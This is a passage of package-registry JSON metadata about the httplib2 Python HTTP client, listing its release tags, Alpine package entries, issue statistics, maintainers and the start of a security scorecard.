/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:58:22.742Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":29.555125725338492,"stargazers_count":5.909090909090909,"forks_count":4.090909090909091,"average":9.888781431334623},"purl":"pkg:apk/alpine/py2-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.10","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py2-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py2-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py2-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py2-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py2-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py2-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py2-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py2-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py2-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":254,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T01:01:31.368Z","updated_at":"2023-02-01T01:01:31.368Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.10","url":"https://pkgs.alpinelinux.org/packages?branch=v3.10","ecosystem":"alpine","default":false,"packages_count":10340,"maintainers_count":177,"namespaces_count":2,"keywords_count":925,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":401},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.780Z","updated_at":"2026-08-25T05:05:03.800Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/namespaces"}},{"id":10344533,"name":"py3-httplib2-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-httplib2","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_number":"0.22.0-r2","last_synced_at":"2026-08-03T19:02:43.847Z","created_at":"2024-06-11T09:58:51.324Z","updated_at":"2026-08-21T15:19:08.727Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.20/community/x86_64/py3-httplib2-pyc","install_command":"apk add py3-httplib2-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a 